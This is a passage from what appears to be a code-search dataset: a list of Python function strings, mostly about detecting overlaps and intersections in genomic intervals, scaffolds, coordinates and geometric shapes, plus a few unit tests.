'tmax')\r\n if tmin is not None:\r\n tmin = tmin * 1.8 + 32\r\n if tmax is not None:\r\n tmax = tmax * 1.8 + 32\r\n elif acis_station is not None:\r\n tmin = acis_station['data'][i][0]\r\n tmax = acis_station['data'][i][1]\r\n\r\n # if tmin or tmax is missing, set to previous day's and mark as missing\r\n if tmin is not None and tmin != 'M':\r\n tmin = float(tmin)\r\n prev_tmin = tmin\r\n else:\r\n missing_data = True\r\n tmin = prev_tmin\r\n if tmax is not None and tmax != 'M':\r\n tmax = float(tmax)\r\n prev_tmax = tmax\r\n else:\r\n missing_data = True\r\n tmax = prev_tmax\r\n\r\n # compute gdd and agdd for both bases\r\n gdd32 = compute_gdd(tmin, tmax, 32)\r\n gdd50 = compute_gdd(tmin, tmax, 50)\r\n\r\n agdd32 += gdd32\r\n agdd50 += gdd50\r\n\r\n if not already_retrieved:\r\n 
# do an insert or update\r\n add_agdd_row(station['station_id'], source_id, gdd32, agdd32, day.year, doy, day, 32, missing_data, tmin, tmax)\r\n add_agdd_row(station['station_id'], source_id, gdd50, agdd50, day.year, doy, day, 50, missing_data, tmin, tmax)", "def adjacency_extraction_consistent(wfc_ns, pattern_cat):\n # This is a brute force implementation. We should really use the adjacency list we've already calculated...\n legal = []\n #print(f\"pattern_cat\\n{pattern_cat}\")\n for p1, pattern1 in enumerate(pattern_cat):\n for d_index, d in enumerate(wfc_ns.adjacency_directions):\n for p2, pattern2 in enumerate(pattern_cat):\n if is_valid_overlap_xy(d, p1, p2, pattern_cat, wfc_ns.pattern_width, wfc_ns.adjacency_directions):\n legal.append((d_index, p1, p2))\n return legal", "def get_exon_unions(x):\n if x.shape[0] == 1:\n return x\n\n # sort exons according to start position.\n x = x[np.argsort(x[:, 0]), :]\n concat_exons = list()\n\n # determine if exons bleed into any succeeding exons.\n # this happens if exon i's end position >= exon j's start position, j > i.\n for i in range(x.shape[0] - 1):\n bleeding = np.where(x[i, 1] >= x[(i + 1):, 0])[0]\n if len(bleeding) > 0:\n concat_exons.append([i, max(bleeding) + (i + 1)])\n\n if concat_exons:\n drop_exons = np.unique(flatten_2d(concat_exons))\n union_exons = list()\n\n # take min(start), max(end) for exons with overlap.\n for j in np.unique([z[1] for z in concat_exons]):\n bleed_start = np.min(np.where([z[1] == j for z in concat_exons])[0])\n start = x[concat_exons[bleed_start][0]][0]\n end = x[j][1]\n union_exons.append([start, end])\n\n # drop old intersecting exons and stack up newly unioned exons.\n x = np.delete(x, obj=drop_exons, axis=0)\n x = np.vstack([x, np.vstack(union_exons)])\n x = np.unique(x, axis=0)\n x = x[np.argsort(x[:, 0]), :]\n\n return x", "def combine_overlapping_contigs(sc_ov, scaffold_list): \n for k in sc_ov:\n \n conflict = False\n nos = len(sc_ov[k])\n sca_lis = []\n l_length = {}\n r_length = {}\n for n in range(nos):\n \n sca_lis.append(sc_ov[k][n])\n p = sca_lis[n].index(k)\n l_length[n] = p+1\n r_length[n] = len(sca_lis[n]) - p-1\n \n l_longest = max(l_length, key=l_length.get)\n r_longest = max(r_length, key=r_length.get) \n new_scaff = sca_lis[l_longest][:l_length[l_longest]] + sca_lis[r_longest][-r_length[r_longest]:]\n \n alt_scaff = []\n for n in range(nos):\n if str(sca_lis[n][1:-1])[1:-1] not in str(new_scaff): \n conflict = True \n split_scaffs = split_at_conflict(new_scaff, sca_lis[n], k)\n for scaff in split_scaffs:\n if scaff not in alt_scaff:\n alt_scaff.append(scaff)\n\n if not conflict:\n scaffold_list.append(new_scaff)\n else: \n alt_scaff2 = purge_redundancy(alt_scaff) \n for new_scaff in alt_scaff2:\n if len(new_scaff) > 2: #exclude empty scaffolds\n scaffold_list.append(new_scaff)\n \n for scaff in sca_lis:\n if scaff in scaffold_list:\n scaffold_list.remove(scaff)\n else:\n scaff.reverse()\n if scaff in scaffold_list:\n scaffold_list.remove(scaff)\n \n return scaffold_list", "def detect_overlap_1d(first, first_length, second, second_length):\n first_end = first + first_length - 1\n second_end = second + second_length - 1\n return second_end >= first and first_end >= second", "def get_c2sIndsByRoi(rts, sopuids):\n \n # Get the ReferencedSOPInstanceUIDs from the ContourSequence by ROI:\n RSOPuidsByRoi = get_RSOPuidsByRoi(rts)\n \n c2sInds = []\n c2sIndsByRoi = []\n \n # Loop through each list of ReferencedSOPInstanceUIDs:\n for i in range(len(RSOPuidsByRoi)):\n inds = []\n \n for RefUid in 
RSOPuidsByRoi[i]:\n # Find the matching index of RefUid in sopuids:\n inds.append(sopuids.index(RefUid))\n \n c2sInds.extend(inds)\n c2sIndsByRoi.append(inds)\n \n return c2sIndsByRoi, c2sInds", "def find_CX_neighbours(list_of_atoms, atom_list):\n my_list = []\n atom_numbers = []\n for atom in list_of_atoms:\n for element in identify_bonds(atom, atom_list):\n if (((element[0].atom_name == \"CX\") or (element[0].atom_name == \"CY\")) and (element[0].atom_number not in atom_numbers)):\n my_list.append(element[0])\n atom_numbers.append(element[0].atom_number)\n return my_list", "def make_scaff_overlap_dict(contig_location):\n scaffold_overlaps = []\n sc_ov = {}\n for contig in contig_location:\n \n if contig[:4] == \"five\": \n\n if not contig_location[contig] in scaffold_overlaps:\n scaffold_overlaps.append(contig_location[contig])\n sc_ov[contig] = copy.deepcopy(contig_location[contig])\n \n #orient each scaffold so that contig k is fiveprime-threeprime\n #unless it is the first link in the scaffold\n # *** this will fail if the 'unique' contig occurs >1 time in the scaffold!\n # - but split_siamese should have taken care of that\n for k, v in sc_ov.items():\n for scaf in v:\n \n if scaf[1] == k or (other_end(k) in scaf and scaf.index(k) - scaf.index(other_end(k)) == 1):\n if k[:4] == \"five\": scaf.reverse() \n\n return sc_ov", "def overlap(s1, s2):\n j = len(s2) - 1\n while j >= 0 and not s1.endswith(s2[:j + 1]):\n j -= 1\n return j", "def check_for_overlapping_genes(sequence_record):\n overlapping_gene_pairs = []\n all_gene_positions = []\n for gene in sequence_record.features:\n # BCBio uses 0-based and end-exclusive positions (first-third base is bases 0,1,2, i.e range 0-3), \n # so add 1 to start and keep end as is to convert to 1-based-end-inclusive\n all_gene_positions.append((gene.location.start.position+1, gene.location.end.position, gene.id))\n all_gene_positions.sort()\n for gene1_data,gene2_data in itertools.izip(all_gene_positions,all_gene_positions[1:]):\n (gene1_start,gene1_end,gene1_name), (gene2_start,gene2_end,gene2_name) = gene1_data, gene2_data\n if gene1_end>=gene2_start:\n overlapping_gene_pairs.append((gene1_name,gene2_name))\n # check for \"gene1 contains gene2\", print a warning, since it can make other things not work right\n if gene1_end>=gene2_end:\n print(\"WARNING: gene %s is completely inside gene %s! \"%(gene1_name, gene2_name)\n +\"Various gene-position-related results may be inaccurate.\")\n return overlapping_gene_pairs\n # MAYBE-TODO rewrite it so it actually detects ALL overlaps? Right now if gene A contains nonoverlapping genes B and C, it'll sort them as (A,B,C) since A starts first, so it'll detect the (A,B) overlap, but it won't detect the (A,C) overlap because it doesn't CHECK (A,C), only (A,B) and (B,C). This could be fixed either by just brute-force checking all gene pairs (and then using DNA_basic_utilities.position_test_overlap), or by writing something prettier. 
In any case, not a priority, since generally genes DON'T OVERLAP AT ALL.", "def get_overlapping_indices(self):\n return self._get_atomic_overlaps()", "def overlaps(interval,intervals):\n return [x for x in intervals if interval.overlaps(x)]", "def get_overlap_time(begin_at_infected, end_at_infected, begin_at_contact, end_at_contact):\n\n\tbegin_at_infected = begin_at_infected\n\tbegin_at_contact = begin_at_contact\n\tend_at_infected = end_at_infected\n\tend_at_contact = end_at_contact\n\treturn (min(end_at_infected, end_at_contact) - max(begin_at_infected, begin_at_contact))", "def __is_position_overlapped(self, position, exon):\n start, end = self.__get_exon_coordinates(exon)\n return position >= start and position <= end", "def ranges_overlap(start1, end1, start2, end2):\n return start1 <= end2 and end1 >= start2", "def segmented_intersections(lines):\r\n\r\n intersections = []\r\n for i, group in enumerate(lines[:-1]):\r\n for next_group in lines[i+1:]:\r\n for line1 in group:\r\n for line2 in next_group:\r\n intersections.append(intersection(line1, line2)) \r\n\r\n return intersections", "def calc_cst_indices(modes_dir):\n\n def print_ind_names(inds, names, i_start, c_list, verbose=False):\n nami = iter(names)\n for i in inds:\n name = next(nami)\n\n if '-' in name:\n _name = name.split('-')\n mode_in = []\n for m in _name:\n mode_in += re.split('(\\D+)', m)[:]\n mode_in.append(i)\n mode_in.append(0)\n\n c = cc_degrees(mode_in)\n ind = 0\n for _c in c:\n ind += 2*_c + 1\n\n else:\n ind = sc_degrees(i)\n if ind == 0:\n continue\n ind -= 1\n\n i_start += ind\n if verbose:\n print(\"%i, %s\" % (i_start, name))\n c_list.append((i_start, name))\n\n return i_start, c_list\n\n m_sc, m_cc = read_modes_in(modes_dir)\n\n cst_inds = []\n cst_cc_inds = []\n dst_inds = []\n dst_cc_inds = []\n names = []\n names_cc = []\n for m in m_sc[1:]:\n mode = m.split()\n names.append(''.join(mode[:3]))\n\n cst_max = int(mode[3])\n mode_smax = max(max_sc_degrees(int(cst_max)))\n if cst_max > mode_smax:\n cst_max = mode_smax\n cst_inds.append(cst_max)\n\n dst_max = int(mode[4])\n if dst_max > mode_smax:\n dst_max = mode_smax\n dst_inds.append(dst_max)\n\n if m_cc is not None:\n no_cc = int(m_cc[0])\n for m in m_cc[1:no_cc+1]:\n mode = m.split()\n names_cc.append(''.join(mode[0:3]) + '-' + ''.join(mode[3:6]))\n\n cst_cc_max = int(mode[6])\n cst_cc_inds.append(cst_cc_max)\n\n dst_cc_max = int(mode[7])\n dst_cc_inds.append(dst_cc_max)\n coef_order = []\n ind, coef_order = print_ind_names(cst_inds, names, 0, coef_order)\n if m_cc is not None:\n ind, coeff_order = print_ind_names(cst_cc_inds, names_cc, ind,\n coef_order)\n ind, coef_order = print_ind_names(dst_inds, names, ind, coef_order)\n\n if m_cc is not None:\n ind, coef_order = print_ind_names(dst_cc_inds, names_cc, ind,\n coef_order)\n\n return coef_order", "def get_available_cops():\n allIncidents = Incident.get_all()\n cops = []\n \n for i in allIncidents:\n if(inicioAmostragem <= i.reporting_date and i.reporting_date <=terminoAmostragem):\n cops.append(i['operations_center']['id'])\n \n allReports = RelatoDeSituacao.get_all()\n \n for r in allReports:\n if (\n inicioAmostragem <= r.data_hora and \n r.data_hora <=terminoAmostragem and\n 'cop' in r.relator and # todos tem que ter o COP\n 'id' in r.relator['cop'] # todos tem que ter o id \n ):\n cops.append(r.relator['cop']['id'])\n \n return set(cops)", "def overlap_checker(x1, y1, x2, y2, all_coord):\n overlaps = False\n i = 0\n start = 0\n for i in range(int(len(all_coord)/4)):\n b = all_coord[start:start 
+ 4]\n start += 4\n try:\n if (max(b[0], b[2]) <= min(x1, x2) or max(x1, x2) <= min(b[0], b[2]) or max(b[1], b[3]) <= min(y1, y2) or max(y1, y2) <= min(b[1], b[3])):\n if not (min(x1, x2) <= min(b[0], b[2]) and min(y1, y2) <= min(b[1], b[3]) and max(x1, x2) >= max(b[0], b[2]) and max(y1, y2) >= max(b[1], b[3])):\n if not (min(b[0], b[2]) <= min(x1, x2) and min(b[1], b[3]) <= min(y1, y2) and max(b[0], b[2]) >= max(x1, x2) and max(b[1], b[3]) >= max(y1, y2)):\n overlaps = False\n else:\n return True\n else:\n return True\n else:\n return True\n except TypeError:\n overlaps = False\n if not overlaps:\n return False", "def segmented_intersections(lines):\n\n intersections = []\n for i, group in enumerate(lines[:-1]):\n for next_group in lines[i+1:]:\n for line1 in group:\n for line2 in next_group:\n intersections.append(intersection(line1, line2)) \n\n return intersections", "def find_all( source, substring, start=None, end=None, overlap=False ):\n return [x for x in find_all_iter( source, substring, start, end, overlap )]", "def get_segments(cst):\n assert isinstance(cst, ChromStruct)\n\n # create a set of coordinates for the start and end of segments\n segs = np.load(cst.sg_files)['sg']\n end = np.cumsum(segs)\n start = np.concatenate(([0], end[:-1]))\n\n return np.column_stack((start, end)).astype(int)", "def get_intersecting_dissemination_ids(cross_section, dissemination_areas):\n assert 'DAUID' in cross_section.columns \n dissem_arr = dissemination_areas.loc[dissemination_areas['DAUID'].isin(np.unique(cross_section['DAUID'].values))].DAUID.unique()\n reg_arr = dissemination_areas.loc[dissemination_areas['DAUID'].isin(np.unique(cross_section['DAUID'].values))].CSDUID.unique()\n# code_arr = dissemination_areas.loc[dissemination_areas['DAUID'].isin(np.unique(cross_section['DAUID'].values))].CODEID.unique()\n\n\n return list(dissem_arr), list(reg_arr)", "def test_overlap_set_basic_d(test_input_scheme, overlapped_records_generate):\n callers = ['MuTect2', 'MuSE', 'SomaticSniper']\n maf_lines = [\n [\n 'chr1\\t1\\t1\\tSNP\\tA\\tC\\tA\\tC\\tA\\tA\\t10\\t2\\t8\\t8\\t8\\t0\\t\\t\\n',\n 'chr1\\t1\\t1\\tINS\\t-\\tCC\\t-\\tCC\\t-\\t-\\t10\\t2\\t8\\t8\\t8\\t0\\t\\t\\n',\n ],\n 'chr1\\t1\\t1\\tSNP\\tA\\tC\\tA\\tC\\tA\\tA\\t20\\t2\\t18\\t8\\t8\\t0\\t\\t\\n',\n 'chr1\\t1\\t1\\tSNP\\tA\\tT\\tA\\tT\\tA\\tA\\t20\\t2\\t18\\t8\\t8\\t0\\t\\t\\n'\n ]\n\n record = overlapped_records_generate(\n test_input_scheme,\n maf_lines,\n callers)\n\n assert not record.is_singleton()\n\n assert ['MuSE', 'MuTect2', 'SomaticSniper'] == record.callers\n\n assert ('INS', 'SNP') == record.variant_types\n\n assert '1:1:C' in record.locus_allele_map\n assert '1:1:CC' in record.locus_allele_map\n assert '1:1:T' in record.locus_allele_map\n assert len(record.locus_allele_map) == 3\n assert len(record.locus_allele_map['1:1:C']) == 2\n assert len(record.locus_allele_map['1:1:T']) == 1\n assert len(record.locus_allele_map['1:1:CC']) == 1\n\n assert ('MuTect2', 'SNP') in record.caller_type_map \\\n and ('MuSE', 'SNP') in record.caller_type_map \\\n and ('SomaticSniper', 'SNP') in record.caller_type_map \\\n and ('MuTect2', 'INS') in record.caller_type_map\n\n assert len(record.caller_type_map) == 4\n\n assert record.all_single_record() is False", "def findSubsetIndices(min_lat,max_lat,min_lon,max_lon,lats,lons):\n res=np.zeros((4),dtype=np.float64)\n minLon=min_lon; maxLon=max_lon\n\n distances1 = []; distances2 = []\n indices=[]; index=1\n\n for point in lats:\n s1 = max_lat-point # (vector subtract)\n s2 = min_lat-point # (vector 
subtract)\n distances1.append((np.dot(s1, s1), point, index))\n distances2.append((np.dot(s2, s2), point, index-1))\n index=index+1\n\n distances1.sort()\n distances2.sort()\n indices.append(distances1[0])\n indices.append(distances2[0])\n\n distances1 = []; distances2 = []; index=1\n\n for point in lons:\n s1 = maxLon-point # (vector subtract)\n s2 = minLon-point # (vector subtract)\n distances1.append((np.dot(s1, s1), point, index))\n distances2.append((np.dot(s2, s2), point, index-1))\n index=index+1\n\n distances1.sort()\n distances2.sort()\n indices.append(distances1[0])\n indices.append(distances2[0])\n\n # Save final product: max_lat_indices,min_lat_indices,max_lon_indices,min_lon_indices\n minJ=indices[1][2]\n maxJ=indices[0][2]\n minI=indices[3][2]\n maxI=indices[2][2]\n\n res[0]=minI; res[1]=maxI; res[2]=minJ; res[3]=maxJ\n return res", "def findsegments(id1, seq1, id2, seq2, minlen):\n\n segments = \"\"\n\n # Initialize list of corresponding residues.\n correspondances = []\n for res in seq1:\n correspondances.append([])\n \n # Main loop.\n for i in range(len(seq1)-minlen):\n seg1 = seq1[i:i+minlen]\n for j in range(len(seq2)-minlen):\n if j not in correspondances[i]:\n seg2 = seq2[j:j+minlen]\n if seg1 == seg2:\n # Look if the segment is longer than minlen.\n segments_equal = True\n prev1 = seg1\n prev2 = seg2\n extend = 1\n while segments_equal == True:\n i_end = i+minlen+extend\n j_end = j+minlen+extend\n ext1 = seq1[i:i_end]\n ext2 = seq2[j:j_end]\n if i_end > len(seq1) or j_end > len(seq2):\n seqend = True\n else:\n seqend = False\n if ext1 != ext2 or seqend == True:\n segments_equal = False\n segments += \"{} \".format(prev1)\n segments += \"{} [{}, {}] \".format(id1, i, i_end-2)\n segments += \" \"\n segments += \"{} [{}, {}] \".format(id2, j, j_end-2)\n segments += \"\\n\"\n # Add residues to correspondance list.\n for k in range(minlen+extend-1):\n l = i+k\n m = j+k\n correspondances[l].append(m)\n prev1 = ext1\n prev2 = ext2\n extend += 1\n\n return segments", "def overlap(table1, table2):\n out = np.zeros(np.size(table1, axis=0), dtype='bool')\n for i in range(np.size(table1, axis=0)):\n s1_s2 = table1[i, 0] < table2[:, 0] \n s1_e2 = table1[i, 0] <= table2[:, 1]\n e1_s2 = table1[i, 1] < table2[:, 0]\n e1_e2 = table1[i, 1] < table2[:, 1]\n # no overlap occurs when all four parameters above either == 0 or 1\n sum_params = np.sum(np.array([s1_s2, s1_e2, e1_s2, e1_e2]), axis=0)\n olap = (sum_params == 1) | (sum_params == 2) | (sum_params == 3)\n out[i] = np.any(olap)\n return out", "def print_overlaps(gt_list, det_list):\n\n overlap_list = []\n high = 0\n for i_1, grt in enumerate(gt_list):\n for i_2, det in enumerate(det_list):\n overlap = overlap_between(grt, det)\n print(i_1, i_2, overlap)\n if overlap > high:\n high = overlap\n overlap_list.append(high)\n high = 0\n\n print(overlap_list)", "def find_own_objects(cs):\n own_objects = {}\n for con in cs:\n own_objects[con] = []\n for obj in con.extent:\n own_objects[con].append(obj)\n for sub_con in cs:\n if sub_con.extent < con.extent and\\\n obj in sub_con.extent:\n own_objects[con].pop()\n break\n return own_objects", "def recip_compare(s_file, c_file):\r\n recip_list = []\r\n cross_match = 0\r\n for row in s_file.itertuples():\r\n Q_gene = row.Query_gene\r\n adj_gene_interm = row.adjacent_genes.split(\";\")\r\n # list comp to strip metadata and keep gene name\r\n adj_genes = [i.split(\",\")[0] for i in adj_gene_interm]\r\n counter = 0\r\n for adj_gene in adj_genes:\r\n Q_search = 
c_file[c_file.Query_gene.isin([adj_gene])].index.tolist()\r\n # check to to see that the is one to one match first\r\n if Q_search and c_file.at[Q_search[0], \"gene_type\"] ==\"one_to_one_mapping\":\r\n # Q_search will always results in a list size of 1\r\n S_search = c_file.at[Q_search[0], \"Sytentic_genes\"].split(\",\")[0]\r\n if S_search == Q_gene:\r\n counter += 1\r\n if counter == len(adj_genes):\r\n cross_match += 1\r\n recip_list.append(row)\r\n recip_df = pd.DataFrame(recip_list)\r\n return(recip_df)", "def GetMatchedSubContourLists(\n scListRef,\n scList,\n allValsByFrame,\n orderOfSCsByValue,\n splitLength=1,\n fixedNumInteriorPoints=None,\n):\n ## NOT DONE! MERGE LATER??\n return simplifiedSCListRef, simplifiedSCList", "def get_elim_candidates(df2, df1):\n if df1.loc[1,'Problem']!= problems[0]:\n return\n \n nodes_order_av, nodes_above = order_analysis(df2, df1, 'NewNodes')\n time_order_av, time_above = order_analysis(df2, df1, 'ElapsedSeconds')\n elim_candidates = set(nodes_above[:nodes_order_av]).intersection(set(time_above[:time_order_av]))\n # return their 1-base index also:\n out = [(SEARCHES.index(c)+1, c) for c in elim_candidates]\n return out", "def get_seq_overlap(seq1, seq2):\n\n overlap = 0\n for i in range(len(seq1)):\n if seq1[i] != \"-\" and seq2[i] != \"-\":\n overlap += 1\n\n return overlap", "def test_overlap_set_basic_c(test_input_scheme, overlapped_records_generate):\n callers = ['MuTect2', 'MuSE', 'SomaticSniper']\n maf_lines = [\n 'chr1\\t1\\t1\\tSNP\\tA\\tC\\tA\\tC\\tA\\tA\\t10\\t2\\t8\\t8\\t8\\t0\\t\\t\\n',\n 'chr1\\t1\\t1\\tSNP\\tA\\tC\\tA\\tC\\tA\\tA\\t20\\t2\\t18\\t8\\t8\\t0\\t\\t\\n',\n 'chr1\\t1\\t1\\tSNP\\tA\\tT\\tA\\tT\\tA\\tA\\t20\\t2\\t18\\t8\\t8\\t0\\t\\t\\n'\n ]\n\n record = overlapped_records_generate(\n test_input_scheme,\n maf_lines,\n callers)\n\n assert not record.is_singleton()\n\n assert ['MuSE', 'MuTect2', 'SomaticSniper'] == record.callers\n\n assert ('SNP',) == record.variant_types\n\n assert '1:1:C' in record.locus_allele_map\n assert '1:1:T' in record.locus_allele_map\n assert len(record.locus_allele_map) == 2\n assert len(record.locus_allele_map['1:1:C']) == 2\n assert len(record.locus_allele_map['1:1:T']) == 1\n\n assert ('MuTect2', 'SNP') in record.caller_type_map \\\n and ('MuSE', 'SNP') in record.caller_type_map \\\n and ('SomaticSniper', 'SNP') in record.caller_type_map\n assert len(record.caller_type_map) == 3\n\n assert record.all_single_record() is True", "def extract_upstream(indicies, genome, amount, overlap, min_length=8):\n\n records = []\n prev_end = -1\n index = 0\n for feature in filter(lambda f: f.type == \"CDS\", genome.features):\n if index in indicies:\n end = int(feature.location.start)\n start = max(end - amount, 0)\n if not overlap:\n start = max(start, prev_end)\n\n if (end - start) > min_length:\n upstream = genome[start:end]\n upstream.id = \"{0}|{1}\".format(genome.id, feature.qualifiers[\"locus_tag\"][0])\n records.append(upstream)\n\n index += 1\n prev_end = int(feature.location.end)\n\n return records", "def doubleStartEndPoints(netlist, chip_to_occurrences=None):\n som = 0\n if chip_to_occurrences is None:\n chips_in_netlist = list(itertools.chain.from_iterable(netlist))\n occurrences = np.bincount(chips_in_netlist)\n for i in occurrences:\n if i > 1:\n som += i\n else:\n for i in chip_to_occurrences.values():\n if i > 1:\n som += i\n return som", "def GetContourValuesLengthsAndSubContoursAndOrderOfSubContoursByFrame(\n watershed, allValsByFrame\n):\n scListByFrame, orderOfSCsByValueByFrame = 
GetSubContoursAndOrderingByFrame(\n watershed, allValsByFrame\n )\n cVLSByFrame = [[sc.cVLS() for sc in scList] for scList in scListByFrame]\n return cVLSByFrame, orderOfSCsByValueByFrame\n\n ## NOT NEEDED! KEEPING FOR REFERENCE!\n # for i in range(len(cVLS)-1,0,-1):\n # for j in range(i-1,-1,-1): # Loop backwards through the sorted list of cvls's... if the value pair matches, check the endpoints (they will always be reversed for adjacent regions (always go ccw...))\n # if cVLS[i][0]!=cVLS[j][0]: # once we no longer match the value pair, we know there are no more matches in the list...\n # break\n # ######## VERIFY THIS ACTUALLY WORKS THE SAME WAY!!!\n # elif (cVLS[i][2][-1],cVLS[i][2][0]]) == (cVLS[j][2][0],cVLS[j][2][-1]): # if 2 subcoutours are the same,\n # if cVLS[j][1]>cVLS[i][1]:\n # cVLS[j],cVLS[i] = cVLS[i],cVLS[j] #swap!\n # shortest = min(cVLS[j][1],cVLS[i][1]) # keep only the one with the minimum length computation\n #\n # cVLS[j][1] = shortest\n # del(cVLS[i])\n # break", "def get_overlap(a, b):\n return max(0, min(a[1], b[1]) - max(a[0], b[0]))", "def example1_perfect_overlap(GeomCA_parameters):\n num_pts = 100\n GeomCA_parameters['experiment_filename_prefix'] = 'perfect_overlap_'\n subfolder = 'perfect_overlap'\n R = np.concatenate([circle(n=num_pts, r=1.5), circle(n=int(num_pts/5), r=0.3)])\n E = np.concatenate([circle(n=num_pts, r=1.45), circle(n=int(num_pts/5), r=0.32)])\n return run_GeomCA_and_visualize(R, E, subfolder, GeomCA_parameters)", "def find_indices(colorhs, centres):\n\n indices = np.zeros(colorhs.shape[0], dtype=np.uint8)\n i = 0\n\n for hs in colorhs:\n # Past Euclidian distance\n past_ed = float(\"inf\")\n for cluster in range(centres.shape[0]):\n # Current Euclidian distance\n curr_ed = (sum((hs - centres[cluster, :]) ** 2)) ** 1/2\n # A frame belongs to the cluster with the minimum ed value.\n if curr_ed <= past_ed:\n past_ed = curr_ed\n indices[i] = cluster\n i += 1\n return indices", "def interval_intersect(a, b, c, d):\r\n return (c <= b) and (a <= d)", "def find_intersection(snp_name):\n intersect = set(snp_name[0])\n for i in range(1,len(snp_name)):\n intersect = intersect.intersection(set(snp_name[i]))\n return list(intersect)", "def new_resolve_unique_contigs(scaffold_list, unique_contigs_list):\n \n contig_location = {}\n s_l = copy.deepcopy(scaffold_list)\n \n #first deal with any scaffolds that have more than one copy of a unique contig\n to_remove = []\n for scaf in s_l: \n for contig in unique_contigs_list:\n if scaf.count(contig) > 1:\n scaffold_parts = split_siamese(contig, scaf)\n to_remove.append(scaf)\n s_l.extend(scaffold_parts)\n break \n for scaf in to_remove:\n s_l.remove(scaf) \n\n\n for contig in unique_contigs_list:\n #if contig[:4] == \"five\": \n finds = find_unique_contig(contig, s_l)\n\n if len(finds) > 1:\n contig_location[contig] = finds\n\n sc_ov = {}\n sc_ov = make_scaff_overlap_dict(contig_location)\n\n #This is the new bit that takes just the first conflicted contig \n first_k = list(sc_ov.items())[0:1]\n first_sc_ov = dict(first_k)\n new_scaffold_list = combine_overlapping_contigs(first_sc_ov, s_l)\n\n #Split off unique scaffolds attached by their 3' ends to multiple scaffolds\n \n for contig in contig_location:\n if contig[:5] == \"three\":\n for scaf in contig_location[contig]:\n conflict = False\n if scaf.index(contig) == 1:\n conflict = True\n new_left_scaf = scaf[:3]\n new_right_scaf = scaf[3:]\n if scaf.index(contig) == len(scaf) - 2:\n conflict = True\n new_left_scaf = scaf[:-3]\n new_right_scaf = scaf[-3:]\n if 
conflict:\n new_left_scaf.append(\"link_conflict6\")\n new_right_scaf.insert(0,\"link_conflict6\")\n if len(new_left_scaf) >= 4: \n new_scaffold_list.append(new_left_scaf)\n if len(new_right_scaf) >= 4:\n new_scaffold_list.append(new_right_scaf)\n if scaf in new_scaffold_list:\n new_scaffold_list.remove(scaf)\n\n return new_scaffold_list", "def calcOverlap(intervals):\n bp = 0 \n for i in intervals:\n bp += sum([overlapCases(i, j) for j in intervals])\n return(bp)", "async def test_get_cds_start_end(test_db):\n expected = (61, 2362)\n resp = await test_db.get_cds_start_end(\"NM_004333.4\")\n assert resp == expected\n\n resp = await test_db.get_cds_start_end(\"ENST00000288602.6\")\n assert resp == expected\n\n resp = await test_db.get_cds_start_end(\"NM_004333.999\")\n assert resp is None", "def source_positions(self, dist_cutoff=None):\n \n crds = {}\n for fn in self.srclists:\n \n print(\"OM::source_positions -- checking: \",fn) \n ff = pyfits.open(fn)\n idf = fn[-20:-14]\n obsid = ff[0].header[\"OBS_ID\"]\n print(obsid, idf)\n try:\n ra, dec = ff[1].data[\"RA\"], ff[1].data[\"DEC\"]\n except:\n print(fn,\" does not contain RA, Dec coordinates.\")\n continue\n rate = ff[1].data[\"CORR_RATE\"]\n coords = C.SkyCoord(ra, dec, unit=(\"deg\", \"deg\"), frame='icrs')\n tc = []\n ci = []\n for i, c in enumerate(coords):\n #print(c)\n if len(tc) == 0: \n tc.append(c.to_string(\"hmsdms\",sep=':', precision=2, pad=True))\n ci.append(i)\n continue\n #print(c, tc, sc)\n dist = c.separation(coords[ci]).arcsec\n #print(\"dist: \",dist)\n gi = np.where(dist>2)[0]\n for j in gi:\n tc.append(c.to_string(\"hmsdms\",sep=':', precision=2, pad=True))\n #ci.append(j)\n if len(tc)>0:\n crds[idf] = tc\n #else:\n if len(crds) == 0:\n return None\n return {obsid:crds}", "def overlap(a, b):\n return not(a[2]<=b[0] or a[3]<=b[1] or a[0]>=b[2] or a[1]>=b[3])", "def locate_slice_chunk(slice_start, slice_stop, height, overlap_metadata):\n if slice_stop < slice_start:\n raise ValueError(\n \"Stopping index must be larger than the starting index!!!\")\n g_nrow = overlap_metadata.shape[0] + 1\n side = overlap_metadata[0, 0, 1]\n overlap_list = overlap_metadata[:, 0, 0]\n if side == 1:\n list_slices = [(np.arange(i * height, i * height + height) -\n np.sum(overlap_list[0: i])) for i in range(g_nrow)]\n else:\n list_slices = [\n (np.arange(i * height + height - 1, i * height - 1, -1) -\n np.sum(overlap_list[0: i])) for i in range(g_nrow)]\n list_slices = np.asarray(list_slices)\n results = []\n for i, list1 in enumerate(list_slices):\n result1 = []\n if side == 1:\n for slice_idx in range(slice_start, slice_stop):\n pos = np.squeeze(np.where(list1 == slice_idx)[0])\n if pos.size == 1:\n fact = 1.0\n if i == 0:\n ver_overlap = overlap_list[i]\n dis1 = len(list1) - pos - 1\n if dis1 < ver_overlap:\n fact = dis1 / (ver_overlap - 1)\n elif i == (g_nrow - 1):\n ver_overlap = overlap_list[i - 1]\n if pos < ver_overlap:\n fact = pos / (ver_overlap - 1)\n else:\n ver_overlap1 = overlap_list[i]\n dis1 = len(list1) - pos - 1\n if dis1 < ver_overlap1:\n fact = dis1 / (ver_overlap1 - 1)\n if pos < ver_overlap1:\n fact = pos / (ver_overlap1 - 1)\n ver_overlap2 = overlap_list[i - 1]\n dis1 = len(list1) - pos - 1\n if dis1 < ver_overlap2:\n fact = dis1 / (ver_overlap2 - 1)\n if pos < ver_overlap2:\n fact = pos / (ver_overlap2 - 1)\n result1.append([i, pos, fact])\n else:\n for slice_idx in range(slice_start, slice_stop):\n pos = np.squeeze(np.where(list1 == slice_idx)[0])\n if pos.size == 1:\n fact = 1.0\n if i == 0:\n ver_overlap = 
overlap_list[i]\n if pos < ver_overlap:\n fact = 1.0 * pos / (ver_overlap - 1)\n elif i == (g_nrow - 1):\n ver_overlap = overlap_list[i - 1]\n dis1 = len(list1) - pos - 1\n if dis1 < ver_overlap:\n fact = 1.0 * dis1 / (ver_overlap - 1)\n else:\n ver_overlap1 = overlap_list[i]\n dis1 = len(list1) - pos - 1\n if dis1 < ver_overlap1:\n fact = 1.0 * dis1 / (ver_overlap1 - 1)\n if pos < ver_overlap1:\n fact = 1.0 * pos / (ver_overlap1 - 1)\n ver_overlap2 = overlap_list[i - 1]\n dis1 = len(list1) - pos - 1\n if dis1 < ver_overlap2:\n fact = 1.0 * dis1 / (ver_overlap2 - 1)\n if pos < ver_overlap2:\n fact = 1.0 * pos / (ver_overlap2 - 1)\n result1.append([i, pos, fact])\n if len(result1) > 0:\n results.append(result1)\n return results", "def get_all_offgrid_pin(self, pin, insufficient_list):\n #print(\"INSUFFICIENT LIST\",insufficient_list)\n # Find the coordinate with the most overlap\n any_overlap = set()\n for coord in insufficient_list:\n full_pin = 